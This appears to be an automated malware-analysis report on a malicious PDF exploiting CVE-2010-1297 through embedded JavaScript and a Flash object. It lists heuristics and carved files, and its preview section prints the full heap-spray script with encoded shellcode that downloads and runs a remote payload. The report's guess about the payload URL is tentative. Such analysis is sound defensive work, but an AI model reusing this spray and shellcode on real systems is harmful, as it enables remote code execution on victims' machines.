MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
This PDF document contains embedded JavaScript and a Flash object, which are leveraged to exploit CVE-2010-1297, a heap spray vulnerability. The embedded JavaScript uses String.fromCharCode extensively and constructs a large string that appears to be shellcode. This shellcode is likely intended to download and execute a second-stage payload, potentially from the unknown URL http://www.flashandmath.com.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
CVE-2010-1297 — Adobe Flash/Reader authplay heap-spray (Flash-in-PDF) critical CVE likely CVE_2010_1297PDF embeds a Flash (SWF) object via RichMedia and its JavaScript heap-sprays to groom memory for the embedded Flash exploit. This is the CVE-2010-1297 (authplay.dll) Flash-in-PDF memory-corruption shape; the spray is recovered after de-obfuscating space-padded %u, fromCharCode and \u builders that evade the raw heap-spray rules.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var padding = String.fromCharCode(37008) + String.fromCharCode(37008);var html = padding + '\u46EB\u315F\u83C9\u01E9\uFE89\uC030\u012C\uAEF2\u47FE\u89FF\u30FB\u2CC0\uF201\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6071\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5BEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u34E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0774\uCFC1\u0112\uEBC7\u3BF4\u247C\u7528\u8BE1\u245A\uEB01\u8B66\u4B0C … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
RichMedia (Flash) high PDF_RICHMEDIAPDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
-
ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEXHex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.flashandmath.com In PDF document text
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In PDF document text
- http://adobe.com/AS3/2006/builtinIn PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
Adobe.swf |
pdf-embedded-file | PDF EmbeddedFile object 16 at offset 0xAB5 | 55839 bytes |
SHA-256: ce5f7936cf8e3536a88a804ce2d6902022df1794fa878bdc64a26866e34ba989 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=SWF; declared_or_context_type=PDF; filename=Adobe.swf; kind=pdf-embedded-file
|
|||
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0xF5 | 1564 bytes |
SHA-256: ea7dae75a216b6f7bdc2f54d465dfcabc8cdde69e8c4a19ba483c4c4c5378998 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var padding = String.fromCharCode(37008) + String.fromCharCode(37008);var html = padding + '\u46EB\u315F\u83C9\u01E9\uFE89\uC030\u012C\uAEF2\u47FE\u89FF\u30FB\u2CC0\uF201\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6071\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5BEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u34E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0774\uCFC1\u0112\uEBC7\u3BF4\u247C\u7528\u8BE1\u245A\uEB01\u8B66\u4B0C\u5A8B\u011C\u8BEB\u8B04\uE801\u4489\u1C24\uC361\u54EB\uD231\u5252\u5553\uFF52\uEBD0\uEB1A\uE85D\uFF7B\uFFFF\uE7BA\u8BBA\u52C4\uE850\uFF92\uFFFF\uD231\uFF52\uEBD0\uE82D\uFF63\uFFFF\uAABA\u8A6E\u52F3\uE850\uFF7A\uFFFF\uD231\uC283\u83FF\uFAEA\u5352\uD0FF\uC9EB\u47BA\uC87D\u52A0\uE850\uFF60\uFFFF\uAEEB\u5DEB\u34E8\uFFFF\uBAFF\uCE12\u091A\u5052\u4BE8\uFFFF\u56FF\uD0FF\uDAEB\uF9E8\uFFFE\u75FF\u6C72\u6F6D\u2E6E\u6C64\uFF6C\u2E2E\u752F\u6470\u7461\u2E65\u7865\uFF65\u7468\u7074\u2F3A\u692F\u616D\u6567\u6873\u7261\u2E65\u6363\u692F\u616D\u6567\u2F73\u6F64\u6E77\u6F6C\u6461\u665F\u6C69\u2E65\u6870\u3F70\u3D65\u6441\u626F\u2D65\u3032\u3031\u322D\u3838\uFF34\u03CD';while (padding.length < 65564){ padding+=padding;}var value = padding.substring(0, 0x5f4);value += html;value += padding;var destination = value.substring(0, 32768);while(1){ destination += destination; if(destination.length >= 524288) break;}var today = destination.substring(0, 524288 - 2060);var forever = new Array();for (var infinite = 0; infinite < 496; infinite++){ forever[infinite]=today+'s';}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.